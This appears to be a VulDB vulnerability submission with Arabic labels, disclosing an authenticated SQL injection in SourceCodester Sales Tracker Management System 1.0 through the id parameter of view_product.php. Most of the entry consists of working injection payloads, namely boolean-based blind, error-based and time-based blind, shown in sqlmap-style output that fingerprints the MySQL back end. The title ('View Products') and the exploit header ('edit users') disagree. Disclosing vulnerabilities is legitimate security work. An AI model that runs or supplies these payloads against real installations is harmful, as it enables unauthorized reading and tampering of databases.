| عنوان | Authenticated SQL Injection on Sales Tracker System When View Products |
|---|
| الوصف | # Exploit Title: Authenticated SQL Injection on Sales Tracker System When edit users
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# Tested on: Windows 11
# Check Detailed write-up : http://ahmedismailozil.blogspot.com/
```
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://localhost:80/php-sts/admin/products/view_product.php?id=5' AND 3751=3751-- vKjv
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://localhost:80/php-sts/admin/products/view_product.php?id=5' OR (SELECT 4094 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(4094=4094,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- iMtv
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://localhost:80/php-sts/admin/products/view_product.php?id=5' AND (SELECT 1697 FROM (SELECT(SLEEP(5)))HGvM)-- EEHf
---
[09:57:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
``` |
|---|
| المصدر | ⚠️ https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html |
|---|
| المستخدم | mroz1l (UID 41497) |
|---|
| ارسال | 23/02/2023 07:25 AM (3 سنوات منذ) |
|---|
| الاعتدال | 23/02/2023 04:14 PM (9 hours later) |
|---|
| الحالة | مكرر |
|---|
| إدخال VulDB | 221634 [SourceCodester Sales Tracker Management System 1.0 view_product.php معرف حقن SQL] |
|---|
| النقاط | 0 |
|---|